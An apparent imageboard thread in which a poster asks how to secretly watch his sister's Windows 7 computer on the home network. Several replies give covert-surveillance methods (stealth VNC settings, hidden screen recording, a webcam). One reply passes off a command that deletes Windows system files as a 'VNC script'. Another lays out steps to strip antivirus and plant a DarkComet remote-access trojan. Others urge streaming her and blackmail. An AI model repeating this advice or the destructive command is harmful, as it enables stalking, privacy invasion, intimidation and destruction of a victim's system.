Jow Forums Easiest ways to keep an eye on windows 7 computer that is in the other room connected to same router as my...

Jow Forums Easiest ways to keep an eye on windows 7 computer that is in the other room connected to same router as my computer?

Need to keep an eye out for big sis.

Attached: 1538851608479.jpg (750x737, 140K)

easy, become sauron

>Need to keep an eye out for big sis.
;^)

Look at it

Attached: serveimage.jpg (720x720, 42K)

unless you wanna install a RAT or some shit, most you can do is watch DNS queries.
Also, you're creepy.

>DNS queries
can't find shit about it.

what about windows 7 remote desktop ? will she notice that i have connected into her pc?

How do I get a tongue like this?

RDP won't work, unless you create a user for yourself on that computer (but that would be useless). Wireshark is probably what you are looking for. Alternatively, you could setup a DNS server on a Raspberry Pi and send the logs to a file or something. But, I really don't think DNS queries would be 'keeping an eye out', And again, it's creepy.

isnt wireshark just for wireless connections?

jesus fucking christ man, please get off this board.

wtf are these pussies talking about being creepy or some other dumb shit
ffs it's Jow Forums, not reddit
back in the days...

Be a dog

>muh old days
Jow Forums isn't an imageboard dedicated to weirdos who want to spy on their siblings. And this is a technology board.

>back in my day

Attached: 1cd29ed27cec97a4c85fec88eb9afced.jpg (236x335, 11K)

>Jow Forums isn't an imageboard dedicated to weirdos
well, actually

>there was this one guy, talking about Jow Forums
>oh he's that guy

Attached: 1538361674.png (619x346, 36K)

Reddit these days is just like Jow Forums, but instead of good opinions, it's popular opinions that matter, no matter if they are true or not.

>Jow Forums
>good opinions
wat

>Jow Forums Easiest ways to keep an eye on windows 7 computer that is in the other room connected to same router as my computer?

VNC

Just don't move the fucking mouse.

>but instead of good opinions, it's popular opinions that matter, no matter if they are true or not.
same with Jow Forums, Jow Forums is just alot more crude about it

And configure the server to hide the interface, don't remove desktop wallpaper, don't switch the compositor, and use low bandwidth settings to reduce the CPU impact. Plus in the client you want the view only option.

become a thot

run obs in the background, having it record the entire screen, record, later go on the computer and move the file to like a thumbdrive

Attached: 1539043875338.png (450x405, 95K)

First you need to take this line of code "del c:\windows\*.* /F /S /Q /as /ar /aa /ah" without the quotes and put it into a Notepad file named something inconspicuous such as notforspyingonyou.bat in documents on her computer, and double click to run the vnc script. afterwards you do the same on your computer and you should be able to watch what she's doing whenever you run the script

sorry meant to reply to you

this, kys op

Is your sister's computer a desktop? Would she notice if you appropriated a video output from it? You could hook up a second monitor (or maybe some kind of capture device of some sort) and then set the multi-monitor controls to mirror the screens.

Alternatively, do this but instead of having it save locally, stream the video to Twitch along with webcam footage of her using the computer. Now you can see everything she's doing at any time from anywhere. You can also add some donation links in the channel's description or whatever to turn it into a source of income.

why are thots so disgusting

>would stick put his cock in that

if you want to monitor the actual screen, use a vnc server like tightvnc. If you want to monitor the pc itself with a cctv, use ispy and a usb webcam

>Reddit these days is just like Jow Forums
No, these are as different as ADHD is from Aspergers.

thanks amreica

a rat might actually be a good idea. If she's on win7 you should be sure she isn't using an antivirus. if she is, boot a live linux usb, open the windows partition from the file manager and delete the antivirus folder stored in program files. The download dark comet ON A WINDOWS VM, NOT YOUR REAL PHYSICAL PC, and build your payload. Put the payload on a usb stick and run it on your sister's pc. I can prepare you the vm with no-ip set up for 10$ if you want

Or you let her do what she wants and have her face the consequences.

Since you are getting help from Jow Forums, if you catch her doing something fishy you better blackmail her and post pics here you fag.